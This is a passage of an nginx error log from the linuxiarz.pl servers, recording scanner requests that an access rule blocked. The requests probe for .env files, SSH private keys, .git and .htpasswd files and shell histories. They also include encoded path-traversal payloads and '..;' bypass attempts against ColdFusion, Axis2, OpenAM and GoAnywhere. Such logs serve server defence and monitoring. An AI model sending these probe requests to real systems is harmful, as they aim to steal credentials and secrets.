/.drone.yml HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:03:25 [error] 1257#1257: *1325496 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:03:26 [error] 1257#1257: *1325497 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:03:27 [error] 1257#1257: *1325498 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:03:27 [error] 1257#1257: *1325499 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:03:28 [error] 1257#1257: *1325500 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:03:28 [error] 1257#1257: *1325502 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:03:29 [error] 1257#1257: *1325504 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:03:29 [error] 1257#1257: *1325505 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:03:30 [error] 1257#1257: *1325506 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:03:30 [error] 1257#1257: *1325507 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:03:31 [error] 1257#1257: *1325508 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:03:32 [error] 1257#1257: *1325509 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:00 [error] 1257#1257: *1325518 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:01 [error] 1257#1257: *1325519 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:01 [error] 1257#1257: *1325520 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:02 [error] 1257#1257: *1325521 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:03 [error] 1257#1257: *1325522 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:03 [error] 1257#1257: *1325523 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:04 [error] 1257#1257: *1325524 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:05 [error] 1257#1257: *1325525 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.bak HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:06 [error] 1257#1257: *1325526 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:06 [error] 1257#1257: *1325527 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:07 [error] 1257#1257: *1325528 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:08 [error] 1257#1257: *1325529 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:09 [error] 1257#1257: *1325530 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:09 [error] 1257#1257: *1325531 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:10 [error] 1257#1257: *1325532 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:11 [error] 1257#1257: *1325533 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:14 [error] 1257#1257: *1325534 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:15 [error] 1257#1257: *1325535 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:15 [error] 1257#1257: *1325538 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:16 [error] 1257#1257: *1325539 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:16 [error] 1257#1257: *1325541 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:17 [error] 1257#1257: *1325549 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.env.kodi HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:28 [error] 1257#1257: *1325569 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:29 [error] 1257#1257: *1325570 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_dsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:29 [error] 1257#1257: *1325571 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_1024 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:30 [error] 1257#1257: *1325572 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_2048 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:30 [error] 1257#1257: *1325573 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_3072 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:31 [error] 1257#1257: *1325574 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa_4096 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:04:31 [error] 1257#1257: *1325575 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_ed25519 HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:05:59 [error] 1257#1257: *1325650 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:06:00 [error] 1257#1257: *1325651 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:06:01 [error] 1257#1257: *1325653 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:06:02 [error] 1257#1257: *1325656 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:06:02 [error] 1257#1257: *1325657 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:06:03 [error] 1257#1257: *1325658 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:06:10 [error] 1257#1257: *1325672 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/.%25%2532%2565/windows/win.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:08:04 [error] 1257#1257: *1325782 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET //content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:08:47 [error] 1257#1257: *1325823 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /js/../.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/29 14:08:54 [error] 1257#1257: *1325829 access forbidden by rule, client: 195.164.49.71, server: kodi.linuxiarz.pl, request: "GET /..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/05/30 11:07:56 [error] 1257#1257: *1440992 access forbidden by rule, client: 137.184.66.236, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/05/30 23:27:51 [error] 1258#1258: *1529813 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/06/04 14:24:10 [error] 3725719#3725719: *325607 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:24:11 [error] 3725719#3725719: *325617 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:24:12 [error] 3725719#3725719: *325627 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:24:13 [error] 3725719#3725719: *325629 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:24:14 [error] 3725719#3725719: *325641 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:24:14 [error] 3725719#3725719: *325645 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:24:21 [error] 3725719#3725719: *325699 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.cache HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:24:25 [error] 3725719#3725719: *325743 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:24:34 [error] 3725719#3725719: *325823 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:24:37 [error] 3725719#3725719: *325854 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:24:40 [error] 3725719#3725719: *325882 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:24:43 [error] 3725719#3725719: *325910 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:24:44 [error] 3725719#3725719: *325918 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:24:49 [error] 3725719#3725719: *325957 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:24:52 [error] 3725719#3725719: *325987 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:24:54 [error] 3725719#3725719: *326007 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:24:57 [error] 3725719#3725719: *326029 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:01 [error] 3725719#3725719: *326069 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:03 [error] 3725719#3725719: *326087 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:06 [error] 3725719#3725719: *326115 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:08 [error] 3725719#3725719: *326133 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:08 [error] 3725719#3725719: *326143 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:09 [error] 3725719#3725719: *326151 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:11 [error] 3725719#3725719: *326175 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:21 [error] 3725719#3725719: *326265 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:22 [error] 3725719#3725719: *326270 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:27 [error] 3725719#3725719: *326315 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:32 [error] 3725719#3725719: *326365 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:34 [error] 3725719#3725719: *326385 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:37 [error] 3725719#3725719: *326411 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:38 [error] 3725719#3725719: *326419 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:50 [error] 3725719#3725719: *326439 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:52 [error] 3725719#3725719: *326449 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:54 [error] 3725719#3725719: *326460 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:55 [error] 3725719#3725719: *326466 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:56 [error] 3725719#3725719: *326467 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:56 [error] 3725719#3725719: *326471 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:25:57 [error] 3725719#3725719: *326475 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:26:03 [error] 3725719#3725719: *326513 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:26:07 [error] 3725719#3725719: *326538 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:26:10 [error] 3725719#3725719: *326555 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:26:15 [error] 3725719#3725719: *326586 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:26:20 [error] 3725719#3725719: *326603 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:26:25 [error] 3725719#3725719: *326632 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:26:28 [error] 3725719#3725719: *326648 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:26:31 [error] 3725719#3725719: *326665 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:26:37 [error] 3725719#3725719: *326701 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:26:38 [error] 3725719#3725719: *326704 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:26:40 [error] 3725719#3725719: *326717 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:26:43 [error] 3725719#3725719: *326739 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:26:44 [error] 3725719#3725719: *326740 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:26:49 [error] 3725719#3725719: *326765 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:26:51 [error] 3725719#3725719: *326780 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:26:53 [error] 3725719#3725719: *326787 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:26:55 [error] 3725719#3725719: *326799 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:27:03 [error] 3725719#3725719: *326829 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:27:06 [error] 3725719#3725719: *326846 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:27:08 [error] 3725719#3725719: *326853 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:27:11 [error] 3725719#3725719: *326877 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:27:12 [error] 3725719#3725719: *326879 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:27:13 [error] 3725719#3725719: *326882 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:27:18 [error] 3725719#3725719: *326911 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.cache HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:28:46 [error] 3725719#3725719: *327035 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:28:46 [error] 3725719#3725719: *327036 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.svn/wc.db HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 14:28:46 [error] 3725719#3725719: *327037 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.gh/store/00manifest.i HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 16:54:23 [error] 3725719#3725719: *341001 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 16:54:33 [error] 3725719#3725719: *341015 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 16:55:04 [error] 3725719#3725719: *341110 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /hex/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 16:55:18 [error] 3725719#3725719: *341148 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.mysql_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 16:55:33 [error] 3725719#3725719: *341200 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 16:55:38 [error] 3725719#3725719: *341213 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 16:55:48 [error] 3725719#3725719: *341239 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 16:55:49 [error] 3725719#3725719: *341243 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ksh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 16:55:51 [error] 3725719#3725719: *341250 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 16:55:55 [error] 3725719#3725719: *341257 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.sh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 16:55:56 [error] 3725719#3725719: *341262 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.zsh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:02:49 [error] 3725719#3725719: *341681 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:04:19 [error] 3725719#3725719: *341766 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:07:26 [error] 3725719#3725719: *341967 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.mysql_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:09:40 [error] 3725719#3725719: *342120 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:09:43 [error] 3725719#3725719: *342122 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:11:04 [error] 3725719#3725719: *342212 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /hex/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:11:21 [error] 3725719#3725719: *342240 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:11:23 [error] 3725719#3725719: *342243 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /.ksh_history HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:13:02 [error] 3725719#3725719: *342382 access forbidden by rule, client: 195.164.49.71, server: nginx.linuxiarz.pl, request: "GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/06/04 17:13:06 